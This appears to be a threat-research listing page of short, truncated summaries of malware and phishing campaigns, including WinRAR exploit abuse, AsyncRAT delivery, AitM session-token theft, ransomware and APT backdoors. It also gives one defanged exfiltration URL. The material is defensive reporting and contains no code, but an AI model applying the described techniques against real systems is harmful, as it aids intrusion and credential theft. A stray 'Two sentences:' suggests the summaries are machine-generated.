Cyble researchers uncovered a WinRAR CVE-2023-38831 abuse campaign delivering Apanyan Stealer, Murk-Stealer, and AsyncRAT to illicit-content consumers. The campaign starts with a deceptive RAR archive that triggers CMD/PowerShell-driven payloads and ends with …
Category: Threat Research
eSentire’s TRU team uncovered a multi-stage AsyncRAT deployment delivered via HTML smuggling, culminating in process hollowing and injector use to run AsyncRAT inside legitimate Windows processes. The operation starts with a phishing email, HTML/JavaScript loa…
eSentire reports a rise in Adversary-in-the-Middle (AitM) phishing campaigns starting mid-September 2023, where attackers lure users via malicious links or QR codes to capture credentials and session tokens for MFA bypass and BEC. Early detection of anomalous …
NSFOCUS documents three new Mirai-based botnets—hailBot, kiraiBot, and catDDoS—highlighting their spread, distinct capabilities, and techniques to evade detection. The report details propagation methods (vulnerability exploits and weak passwords), persistence …
LostTrust is a new multi-extortion ransomware that evolved from SFile and Mindware, sharing tradecraft with MetaEncryptor and producing similar artifacts and leak-site behavior. It Encrypts files with a distinctive .losttrustencoded extension, attempts to disr…
Dark Pink APT Group (Saaiwc) is a Southeast Asia–focused cyber-espionage actor noted for stealthy campaigns, custom malware, and targeted operations across government, military, and educational sectors. The group relies on spear-phishing, bespoke tools like Te…
Dark River used spearphishing DOCX files exploiting CVE-2021-40444 to drop a modular DLL backdoor (MataDoor) that persists via a signed loader Windows service and is protected with Themida. The backdoor features AES-CFB encrypted configuration, reflective plug…
FortiGuard Labs discovered a targeted spearphishing campaign exploiting Azerbaijan–Armenia tensions that uses HTML smuggling in an HTML memo to deliver a password-protected archive which contains a malicious .LNK that launches an MSI via msiexec. The MSI insta…
In this report, we share our latest crimeware findings: the ASMCrypt cryptor/loader related to DoubleFinger, a new Lumma stealer and a new version of Zanubis Android banking trojan.
Talos reports that Qakbot-affiliated actors have been distributing Ransom Knight ransomware and the Remcos backdoor via phishing emails since early August 2023, continuing despite the FBI’s late August 2023 infrastructure seizure. The operation suggests the de…
EclecticIQ identifies a Chinese state-sponsored cyber-espionage campaign targeting East Asia’s semiconductor sector, using HyperBro loader with DLL-side loading, a Cobra DocGuard-hosted downloader, and a GO-based backdoor named ChargeWeapon to exfiltrate data …
Two sentences: Cyble CRIL observed a phishing campaign targeting Russian users that mirrors banned apps (ExpressVPN, WeChat, Skype) to deliver a Remote Management System (RMS) payload. The RMS tool—a legitimate remote administration utility—has been linked to …
In July 2023 attackers used stolen GitHub personal access tokens to push malicious commits impersonating Dependabot, adding a workflow (hook.yml) that exfiltrated repository secrets to hxxps://send[.]wagateway.pro/webhook and appending obfuscated JavaScript th…
Menlo Labs uncovered a targeted phishing campaign using the EvilProxy kit to impersonate Microsoft via Indeed open redirects, enabling session cookie theft and MFA bypass. The operation targeted US executives across financial services, property management/real…
The CYFIRMA report examines The-Murk-Stealer, an open-source infostealer masquerading as an educational tool that can covertly harvest data from browsers, wallets, messaging apps, VPNs, and more, with anti-analysis features and data exfiltration to Discord, Te…